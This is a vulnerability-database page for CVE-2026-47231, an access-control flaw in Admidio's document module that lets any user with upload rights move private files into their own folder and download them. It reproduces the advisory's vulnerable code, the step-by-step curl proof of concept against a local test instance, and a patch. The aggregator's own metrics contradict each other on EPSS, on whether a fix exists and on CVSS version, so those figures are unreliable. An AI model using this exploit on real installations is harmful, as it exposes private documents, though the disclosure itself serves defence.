CVE-2026-47231

HIGHPre-NVD 8.18.1
EchelonGraph scoreLOW confidence

This high-severity CVE scores 8.1 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.0%, top 90% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
8.1
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: 0%CVSS: 8.1Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Admidio has IDOR in documents-files.php mode=move_save that lets any folder-uploader exfiltrate files from private folders

Summary

modules/documents-files.php gates state-changing modes by checking that the actor has hasUploadRight() on the URL parameter folder_uuid. The move_save handler then operates on a *separate* URL parameter file_uuid and calls File::moveToFolder($destFolderUUID). File::moveToFolder() checks the upload right on the destination folder but never on the source folder containing the file. As a result, any user who can upload to any single folder can move any file from any other folder — including private folders to which they have no view rights — into a folder they control, and then download it. Confidentiality is broken (private file contents leak) and integrity is broken (the file is removed from the original location).

Details

Vulnerable Code

modules/documents-files.php:79-89 — top-level rights check binds to URL folder_uuid:

if ($getMode != 'list' && $getMode != 'download') {
    // check the rights of the current folder
    // user must be administrator or must have the right to upload files
    $folder = new Folder($gDb);
    $folder->getFolderForDownload($getFolderUUID);

if (!$folder->hasUploadRight()) { $gMessage->show($gL10n->get('SYS_NO_RIGHTS')); // => EXIT } }

modules/documents-files.php:187-204 — the move_save branch loads the file by UUID without revalidating the file's actual parent folder:

case 'move_save':
    $documentsFilesMoveForm = $gCurrentSession->getFormObject($_POST['adm_csrf_token']);
    $formValues = $documentsFilesMoveForm->validate($_POST);

if ($getFileUUID !== '') { $file = new File($gDb); $file->readDataByUuid($getFileUUID); // <-- no permission check on the file's source folder $file->moveToFolder($formValues['adm_destination_folder_uuid']); } else { $folder = new Folder($gDb); $folder->readDataByUuid($getFolderUUID); $folder->moveToFolder($formValues['adm_destination_folder_uuid']); }

$gNavigation->deleteLastUrl(); echo json_encode(array('status' => 'success', 'url' => $gNavigation->getUrl())); break;

src/Documents/Entity/File.php:212-223moveToFolder checks only the destination:

public function moveToFolder(string $destFolderUUID)
{
    $folder = new Folder($this->db);
    $folder->readDataByUuid($destFolderUUID);

if ($folder->hasUploadRight()) { // <-- destination only FileSystemUtils::moveFile($this->getFullFilePath(), $folder->getFullFolderPath() . '/' . $this->getValue('fil_name')); $this->setValue('fil_fol_id', $folder->getValue('fol_id')); $this->save(); } }

There is no check that the actor has any right (view, edit, upload) on the folder that *currently* contains the file. The file_uuid URL parameter is independent of folder_uuid, so an attacker can pass folder_uuid= together with file_uuid=. The top-level rights check passes; the destination check passes; the file is moved.

Exploitation Primitive

  • Attacker user lowuser holds folder_upload on a single Documents folder public_uploadable (UUID c41a99c0-…). They have no view or edit rights on private_admin_only (UUID db1f71b9-…, which is a role-restricted folder containing private_to_delete.txt, UUID 559ed352-…).
  • Render the move form with mismatched UUIDs to register a form key in the session:
GET /modules/documents-files.php?mode=move&folder_uuid=c41a99c0-…&file_uuid=559ed352-…
  • Submit move_save with the same mismatch:
POST /modules/documents-files.php?mode=move_save&folder_uuid=c41a99c0-…&file_uuid=559ed352-… with adm_csrf_token= and adm_destination_folder_uuid=c41a99c0-…. Server replies {"status":"success"}. The private_to_delete.txt row in adm_files now has fil_fol_id pointing at the public-uploadable folder.
  • Download the file from its new (publicly-accessible) location:
GET /modules/documents-files.php?mode=download&file_uuid=559ed352-… returns the bytes of private_to_delete.txt.

PoC

Tested live on HEAD c5cde53. The trace below is the agent-captured run; I verified the code paths against the source listed above.

# 0. starting state — lowuser has upload right ONLY on c41a99c0-… (public_uploadable)
$ curl -sb $cookie http://127.0.0.1:8085/modules/documents-files.php?folder_uuid=db1f71b9-…
"You do not have the required permission to perform this action."

1. render the move form using the public folder UUID (where lowuser has upload right)

paired with the PRIVATE file UUID

$ curl -sb $cookie \ "http://127.0.0.1:8085/modules/documents-files.php?mode=move&folder_uuid=c41a99c0-…&file_uuid=559ed352-…"

form rendered, CSRF token X is now in session

2. submit move_save with the same param mismatch

$ curl -sb $cookie -X POST \ "http://127.0.0.1:8085/modules/documents-files.php?mode=move_save&folder_uuid=c41a99c0-…&file_uuid=559ed352-…" \ -d "adm_csrf_token=X&adm_destination_folder_uuid=c41a99c0-…" {"status":"success", "url":"…"}

3. download the leaked file

$ curl -sb $cookie \ "http://127.0.0.1:8085/modules/documents-files.php?mode=download&file_uuid=559ed352-…" private_to_delete_data

The DB record for the file now points at the attacker's folder (fil_fol_id updated), and the file has been physically moved on disk by FileSystemUtils::moveFile.

Impact

Any user with folder_upload right on a single Documents folder gains:

* Read access to every file in private folders — admin-only documents, board-only files, leader-only resources, role-restricted attachments — by moving them into a folder the attacker owns and then downloading. * Write/destruction primitive — the file is no longer in its original folder. Users who depended on the file at its legitimate location can no longer find it. The moved file's permissions are now those of the destination, so previously-restricted content can be exposed to other low-privilege users (whoever else has view rights on the destination folder).

In multi-tenant Admidio installations where one shared deployment hosts multiple groups (e.g., a federation of associations), the bug crosses organisation-internal Documents trust boundaries: a member of group A holding folder_upload on group A's public folder can lift any private file from group B.

PR:L reflects that the actor must hold a single Documents upload right (a routinely-granted role attribute, not an administrator privilege). S:U because the impact stays inside the Documents module's own access-control model, but the access boundary it bypasses is the one that operators most rely on. C:H because confidentiality of any file in any private folder is broken; I:H because file location is mutated.

Recommended Fix

File::moveToFolder() must check that the actor has upload right (or at least edit / move right) on the file's *source* folder, not just on the destination. The minimal patch:

// src/Documents/Entity/File.php
public function moveToFolder(string $destFolderUUID)
{
    // re-read the source folder this file currently lives in, and check rights on it
    $sourceFolder = new Folder($this->db);
    $sourceFolder->readData($this->getValue('fil_fol_id'));
    if (!$sourceFolder->hasUploadRight()) {
        throw new Exception('SYS_NO_RIGHTS');
    }

$destFolder = new Folder($this->db); $destFolder->readDataByUuid($destFolderUUID);

if (!$destFolder->hasUploadRight()) { throw new Exception('SYS_NO_RIGHTS'); }

FileSystemUtils::moveFile($this->getFullFilePath(), $destFolder->getFullFolderPath() . '/' . $this->getValue('fil_name')); $this->setValue('fil_fol_id', $destFolder->getValue('fol_id')); $this->save(); }

Equivalently, documents-files.php case 'move_save' should resolve the file's actual parent folder before the operation and call getFileForDownload() plus hasUploadRight() on that parent. The same fix is needed for Folder::moveToFolder() (the move-folder path is identical in shape).

A regression test should:

  • Create user lowuser with upload right only on folder A.
  • Place a private file in folder B with no rights for lowuser.
  • As lowuser, render mode=move with folder_uuid=A&file_uuid=, then POST mode=move_save with the same.
  • Assert the response is SYS_NO_RIGHTS and the file's fil_fol_id is unchanged.

Related

mode=file_rename_save shares the same root cause and is filed separately (06-documents-cross-folder-rename-idor.md); both bugs flow from the top-level rights check binding to URL folder_uuid rather than the file's actual parent.

CVSS v3
8.1
EG Score
8.1(low)
EPSS
9.7%
KEV
Not listed

Published

May 29, 2026

Last Modified

May 29, 2026

Vendor Advisories for CVE-2026-47231(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
Packagist(1)
PackageVulnerable rangeFixed inDependents
admidio/admidio4.1.0 ... v5.0.9 (55 versions)5.0.10

Data Freshness Timeline

(refreshed 3× in last 7d / 25× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-16 01:46 UTCEG score recompute
  2. 2026-07-14 13:51 UTCEG score recompute
  3. 2026-07-11 16:58 UTCEG score recompute
  4. 2026-07-08 17:15 UTCEG score recompute
  5. 2026-07-02 15:58 UTCEG score recompute
  6. 2026-07-02 03:44 UTCEG score recompute
  7. 2026-07-01 13:05 UTCEG score recompute
  8. 2026-07-01 01:17 UTCEG score recompute
  9. 2026-06-30 00:52 UTCEG score recompute
  10. 2026-06-29 12:29 UTCEG score recompute
  11. 2026-06-28 15:56 UTCEG score recompute
  12. 2026-06-28 03:58 UTCEG score recompute
  13. 2026-06-27 16:12 UTCEG score recompute
  14. 2026-06-27 04:11 UTCEG score recompute
  15. 2026-06-26 16:10 UTCEG score recompute
  16. 2026-06-26 02:34 UTCEG score recompute
  17. 2026-06-25 14:48 UTCEG score recompute
  18. 2026-06-25 02:59 UTCEG score recompute
  19. 2026-06-24 15:10 UTCEG score recompute
  20. 2026-06-24 02:45 UTCEG score recompute
  21. 2026-06-18 22:21 UTCEG score recompute
  22. 2026-06-18 10:16 UTCEG score recompute
  23. 2026-06-17 20:40 UTCEG score recompute
  24. 2026-06-17 08:52 UTCEG score recompute
  25. 2026-06-16 20:55 UTCEG score recompute
Show 35 more
  1. 2026-06-16 09:09 UTCEG score recompute
  2. 2026-06-15 21:09 UTCEG score recompute
  3. 2026-06-15 06:17 UTCEG score recompute
  4. 2026-06-14 23:18 UTCEPSS rescore
  5. 2026-06-14 18:27 UTCEG score recompute
  6. 2026-06-14 06:42 UTCEG score recompute
  7. 2026-06-13 18:56 UTCEG score recompute
  8. 2026-06-13 06:46 UTCEG score recompute
  9. 2026-06-12 23:12 UTCEPSS rescore
  10. 2026-06-12 19:01 UTCEG score recompute
  11. 2026-06-12 07:14 UTCEG score recompute
  12. 2026-06-11 19:28 UTCEG score recompute
  13. 2026-06-11 07:43 UTCEG score recompute
  14. 2026-06-10 19:58 UTCEG score recompute
  15. 2026-06-10 08:12 UTCEG score recompute
  16. 2026-06-09 20:26 UTCEG score recompute
  17. 2026-06-09 08:40 UTCEG score recompute
  18. 2026-06-08 20:54 UTCEG score recompute
  19. 2026-06-08 09:09 UTCEG score recompute
  20. 2026-06-07 21:23 UTCEG score recompute
  21. 2026-06-07 09:38 UTCEG score recompute
  22. 2026-06-06 21:52 UTCEG score recompute
  23. 2026-06-06 10:07 UTCEG score recompute
  24. 2026-06-05 22:21 UTCEG score recompute
  25. 2026-06-05 10:35 UTCEG score recompute
  26. 2026-06-04 22:50 UTCEG score recompute
  27. 2026-06-04 11:04 UTCEG score recompute
  28. 2026-06-03 23:19 UTCEG score recompute
  29. 2026-06-03 11:33 UTCEG score recompute
  30. 2026-06-02 23:47 UTCEG score recompute
  31. 2026-06-02 12:01 UTCEG score recompute
  32. 2026-06-02 00:16 UTCEG score recompute
  33. 2026-06-01 12:30 UTCEG score recompute
  34. 2026-06-01 00:41 UTCEG score recompute
  35. 2026-05-29 22:26 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-47231?
CVE-2026-47231 is a high vulnerability published on May 29, 2026. Admidio has IDOR in documents-files.php mode=move_save that lets any folder-uploader exfiltrate files from private folders Summary modules/documents-files.php gates state-changing modes by checking that the actor has hasUploadRight() on the URL parameter folderuuid. The movesave handler then…
When was CVE-2026-47231 disclosed?
CVE-2026-47231 was first published in the National Vulnerability Database on May 29, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-47231 actively exploited?
CVE-2026-47231 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 9.7% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-47231?
CVE-2026-47231 has a CVSS v4.0 base score of 8.1 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-47231?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-47231, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-47231

Explore →

Is Your Infrastructure Affected by CVE-2026-47231?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.